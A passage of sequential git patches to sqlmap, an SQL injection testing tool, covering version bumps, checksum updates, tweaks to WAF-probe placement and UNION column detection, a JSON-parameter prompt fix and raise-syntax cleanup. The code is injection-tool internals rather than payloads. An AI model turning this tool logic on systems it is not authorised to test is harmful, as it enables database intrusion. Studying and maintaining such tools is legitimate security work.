conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER - value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) + if PLACE.URI in conf.parameters: + place = PLACE.POST + value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) + else: + place = PLACE.GET + value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER + value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) pushValue(conf.timeout) conf.timeout = IDS_WAF_CHECK_TIMEOUT try: - retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO + retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: diff --git a/lib/core/settings.py b/lib/core/settings.py index 72bbce430d9..3207eb04f77 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.14" +VERSION = "1.2.3.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6e21bf0e1c2..b94c0dd07ee 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -5132e59761d8bb617412d2aaaf987716 lib/controller/checks.py +e8533a8a406fe58cc610337639ed4bb1 lib/controller/checks.py 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7e3ed2ba524c6b532fcc13025bd7dc3 lib/core/settings.py +32680252839964d1ff2c62207f64b3b0 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From c024233f883ae04868f42c8b29c716c3ed89cf5e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:28:19 +0100 Subject: [PATCH 061/428] Minor patch --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3207eb04f77..583844a6509 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.15" +VERSION = "1.2.3.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index 33a644c3270..f6a9aa65992 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -128,7 +128,7 @@ def checkDbms(self): warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB logger.warn(warnMsg) - dbgMsg = "...or version is < 1.7.2" % DBMS.HSQLDB + dbgMsg = "...or version is < 1.7.2" logger.debug(dbgMsg) return False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b94c0dd07ee..1dcfb076637 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -32680252839964d1ff2c62207f64b3b0 lib/core/settings.py +a4f32062f445d10c9cb655595beecc78 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -140,7 +140,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -bc8bc5d69cb720fb5dc23af490c7c11c plugins/dbms/hsqldb/fingerprint.py +b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py From cd88caa0e7f3f7e82a2124ee934cc3037e49df55 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:34:31 +0100 Subject: [PATCH 062/428] Fixes #2977 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 14 ++++++++------ txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 583844a6509..378052be8fd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.16" +VERSION = "1.2.3.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 3d621e89860..dee45c66cb4 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -142,14 +142,16 @@ def _orderByTest(cols): elif abs(max_ - min_) >= MIN_STATISTICAL_RANGE: deviation = stdev(ratios) - lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - if min_ < lower: - retVal = minItem[0] + if deviation is not None: + lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation - if max_ > upper: - if retVal is None or abs(max_ - upper) > abs(min_ - lower): - retVal = maxItem[0] + if min_ < lower: + retVal = minItem[0] + + if max_ > upper: + if retVal is None or abs(max_ - upper) > abs(min_ - lower): + retVal = maxItem[0] finally: kb.errorIsNone = popValue() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1dcfb076637..a7c5453d10a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a4f32062f445d10c9cb655595beecc78 lib/core/settings.py +401efa6aae28b56f34420323ac4c2296 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -96,7 +96,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 627ddc86a5a969e5509c7531c5c27a6c lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py +da5a117fb64723e6c815b0e33d50f66a lib/techniques/union/test.py ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 0c4b6c9978ae01325de65bd88a3df9bd9be9d248 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 12 Mar 2018 11:37:48 +0100 Subject: [PATCH 063/428] Fixes #2974 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6b36d1ec02f..41f47398253 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -651,7 +651,7 @@ def walk(head, current=None): message = "it appears that provided value for %s parameter '%s' " % (place, parameter) message += "is JSON deserializable. Do you want to inject inside? [y/N] " - if not readInput(message, default='N', boolean=True): + if readInput(message, default='N', boolean=True): del testableParameters[parameter] testableParameters.update(candidates) break diff --git a/lib/core/settings.py b/lib/core/settings.py index 378052be8fd..e58fcf907d1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.17" +VERSION = "1.2.3.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7c5453d10a..9921850f17f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 052c368ae6ca09362a19376c8483fa85 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -863d9c00a7684db29005705d6dcc36b9 lib/core/common.py +80087ee0716904b24c7970beed20cf27 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -401efa6aae28b56f34420323ac4c2296 lib/core/settings.py +fbcb5796a6af29fc0715fe516e38f754 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From 99894dc3c1bb9563a2dd600f688f602fc5dda908 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 10:37:13 +0100 Subject: [PATCH 064/428] Minor update (git/https repo address consistency) --- lib/core/settings.py | 4 ++-- lib/core/update.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e58fcf907d1..f1f2270c38f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.18" +VERSION = "1.2.3.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -27,7 +27,7 @@ SITE = "http://sqlmap.org" DEV_EMAIL_ADDRESS = "dev@sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" -GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" +GIT_REPOSITORY = "https://github.com/sqlmapproject/sqlmap.git" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" # colorful banner diff --git a/lib/core/update.py b/lib/core/update.py index a411594002e..18771bb1517 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -30,7 +30,7 @@ def update(): if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" + errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.error(errMsg) else: infoMsg = "updating sqlmap to the latest development revision from the " @@ -56,7 +56,7 @@ def update(): else: if "Not a git repository" in stderr: errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" + errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.error(errMsg) else: logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9921850f17f..a5b4fcf18ea 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,14 +46,14 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fbcb5796a6af29fc0715fe516e38f754 lib/core/settings.py +38ff7838ee66e799a8484f4850152cdc lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -063c10fb8261994fe1f8c8ace715aa76 lib/core/update.py +1b655a78fe4d937d39131938a4a5a1d6 lib/core/update.py fc624104ddb36d41794b7a943fde5f21 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From 1d9c11b1c16e7e8fccf8d414846388769c6b8648 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:03:05 +0100 Subject: [PATCH 065/428] Minor update of Travis config --- .travis.yml | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/.travis.yml b/.travis.yml index 7bfe0cef721..192acbf7516 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,4 +1,7 @@ language: python +sudo: false +git: + depth: 1 python: - "2.6" - "2.7" diff --git a/lib/core/settings.py b/lib/core/settings.py index f1f2270c38f..c51ae633ded 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.19" +VERSION = "1.2.3.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a5b4fcf18ea..6ec32bb0ab7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -38ff7838ee66e799a8484f4850152cdc lib/core/settings.py +8e9da51e9fb8e345f5a8bde0f219b696 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From ae2b02952f459ccf4dd0d1280f38c7692e9d966e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Mar 2018 11:13:38 +0100 Subject: [PATCH 066/428] Dealing with deprecated raises --- lib/core/bigarray.py | 6 +++--- lib/core/common.py | 20 +++++++++----------- lib/core/convert.py | 2 +- lib/core/option.py | 12 ++++++------ lib/core/settings.py | 2 +- lib/core/wordlist.py | 4 ++-- lib/parse/cmdline.py | 2 +- lib/parse/payloads.py | 4 ++-- lib/parse/sitemap.py | 2 +- lib/request/basicauthhandler.py | 6 ++---- lib/request/connect.py | 2 +- lib/utils/api.py | 2 +- lib/utils/hashdb.py | 2 +- lib/utils/sqlalchemy.py | 2 +- txt/checksum.md5 | 28 ++++++++++++++-------------- 15 files changed, 46 insertions(+), 50 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index f733b81cbe5..33ebed67a64 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -90,7 +90,7 @@ def pop(self): except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) return self.chunks[-1].pop() @@ -115,7 +115,7 @@ def _dump(self, chunk): errMsg += "make sure that there is enough disk space left. If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def _checkcache(self, index): if (self.cache and self.cache.index != index and self.cache.dirty): @@ -129,7 +129,7 @@ def _checkcache(self, index): except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def __getstate__(self): return self.chunks, self.filenames diff --git a/lib/core/common.py b/lib/core/common.py index 41f47398253..c9ad85a2545 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -596,9 +596,7 @@ def paramToDict(place, parameters=None): testableParameters[parameter] = "=".join(parts[1:]) if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): _ = urldecode(testableParameters[parameter], convall=True) - if (_.endswith("'") and _.count("'") == 1 - or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _))\ - and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): + if (_.endswith("'") and _.count("'") == 1 or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _)) and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " @@ -1371,7 +1369,7 @@ def parseTargetDirect(): raise SqlmapSyntaxException(errMsg) if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): - import _mssql + __import__("_mssql") import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": @@ -1381,17 +1379,17 @@ def parseTargetDirect(): raise SqlmapMissingDependence(errMsg) elif dbmsName == DBMS.MYSQL: - import pymysql + __import__("pymysql") elif dbmsName == DBMS.PGSQL: - import psycopg2 + __import__("psycopg2") elif dbmsName == DBMS.ORACLE: - import cx_Oracle + __import__("cx_Oracle") elif dbmsName == DBMS.SQLITE: - import sqlite3 + __import__("sqlite3") elif dbmsName == DBMS.ACCESS: - import pyodbc + __import__("pyodbc") elif dbmsName == DBMS.FIREBIRD: - import kinterbasdb + __import__("kinterbasdb") except: if _sqlalchemy and data[3] in _sqlalchemy.dialects.__all__: pass @@ -2005,7 +2003,7 @@ def parseXmlFile(xmlFile, handler): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) def getSQLSnippet(dbms, sfile, **variables): """ diff --git a/lib/core/convert.py b/lib/core/convert.py index 5a5701c23d1..c8ebaa0b303 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -80,7 +80,7 @@ def _(self): if len(self.stack) > 1: func = self.stack[-2] if func not in PICKLE_REDUCE_WHITELIST: - raise Exception, "abusing reduce() is bad, Mkay!" + raise Exception("abusing reduce() is bad, Mkay!") self.load_reduce() def loads(str): diff --git a/lib/core/option.py b/lib/core/option.py index 0cfc3caa19d..e4fd1764b90 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -337,7 +337,7 @@ def _parseBurpLog(content): if not host: errMsg = "invalid format of a request file" - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) if not url.startswith("http"): url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) @@ -402,7 +402,7 @@ def __contains__(self, name): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) for node in tree.findall("*"): queries[node.attrib['value']] = iterate(node) @@ -1128,7 +1128,7 @@ def _setHTTPHandlers(): _ = urlparse.urlsplit(conf.proxy) except Exception, ex: errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) hostnamePort = _.netloc.split(":") @@ -1255,7 +1255,7 @@ def _setSafeVisit(): kb.safeReq.post = None else: errMsg = "invalid format of a safe request file" - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) else: if not re.search(r"\Ahttp[s]*://", conf.safeUrl): if ":443/" in conf.safeUrl: @@ -1580,7 +1580,7 @@ def _createTemporaryDirectory(): except (OSError, IOError), ex: errMsg = "there has been a problem while accessing " errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) else: try: if not os.path.isdir(tempfile.gettempdir()): @@ -1607,7 +1607,7 @@ def _createTemporaryDirectory(): except (OSError, IOError, WindowsError), ex: errMsg = "there has been a problem while setting " errMsg += "temporary directory location ('%s')" % getSafeExString(ex) - raise SqlmapSystemException, errMsg + raise SqlmapSystemException(errMsg) def _cleanupOptions(): """ diff --git a/lib/core/settings.py b/lib/core/settings.py index c51ae633ded..1d44c80a3e4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.20" +VERSION = "1.2.3.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index 90d26d4835b..77c779a270c 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -47,7 +47,7 @@ def adjust(self): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) @@ -73,7 +73,7 @@ def next(self): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) except StopIteration: self.adjust() retVal = self.iter.next().rstrip() diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 83161b686f2..832884f31d8 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -909,7 +909,7 @@ def _(self, *args): for arg in shlex.split(command): argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) except ValueError, ex: - raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message + raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message) for i in xrange(len(argv)): if argv[i] == "-hh": diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 9f8d5a41bea..0eda511951f 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -78,7 +78,7 @@ def loadBoundaries(): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) root = doc.getroot() parseXmlNode(root) @@ -93,7 +93,7 @@ def loadPayloads(): errMsg = "something appears to be wrong with " errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg + raise SqlmapInstallationException(errMsg) root = doc.getroot() parseXmlNode(root) diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py index 6724ceb0ed6..3c503f9fb12 100644 --- a/lib/parse/sitemap.py +++ b/lib/parse/sitemap.py @@ -32,7 +32,7 @@ def parseSitemap(url, retVal=None): content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except httplib.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url - raise SqlmapSyntaxException, errMsg + raise SqlmapSyntaxException(errMsg) for match in re.finditer(r"\s*([^<]+)", content or ""): if abortedFlag: diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index cd115e6fc9d..81f4943130a 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -30,10 +30,8 @@ def http_error_auth_reqed(self, auth_header, host, req, headers): self.retried_count = 0 else: if self.retried_count > 5: - raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", - headers, None) + raise urllib2.HTTPError(req.get_full_url(), 401, "basic auth failed", headers, None) else: self.retried_count += 1 - return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed( - self, auth_header, host, req, headers) + return urllib2.HTTPBasicAuthHandler.http_error_auth_reqed(self, auth_header, host, req, headers) diff --git a/lib/request/connect.py b/lib/request/connect.py index 344a093d678..2825c18b4c7 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -982,7 +982,7 @@ def _adjustParameter(paramString, parameter, newValue): if not conf.csrfUrl: errMsg += ". You can try to rerun by providing " errMsg += "a valid value for option '--csrf-url'" - raise SqlmapTokenException, errMsg + raise SqlmapTokenException(errMsg) if token: token = token.strip("'\"") diff --git a/lib/utils/api.py b/lib/utils/api.py index 28f0a6c26f9..d40cc17977c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -277,7 +277,7 @@ def setRestAPILog(): conf.databaseCursor = Database(conf.database) conf.databaseCursor.connect("client") except sqlite3.OperationalError, ex: - raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) + raise SqlmapConnectionException("%s ('%s')" % (ex, conf.database)) # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 8f3c91e35d3..95ce6bbce5d 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -92,7 +92,7 @@ def retrieve(self, key, unserialize=False): except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapConnectionException, errMsg + raise SqlmapConnectionException(errMsg) else: break diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 3644a6d2453..7dfc593096b 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -46,7 +46,7 @@ def connect(self): try: if not self.port and self.db: if not os.path.exists(self.db): - raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db + raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db) _ = conf.direct.split("//", 1) 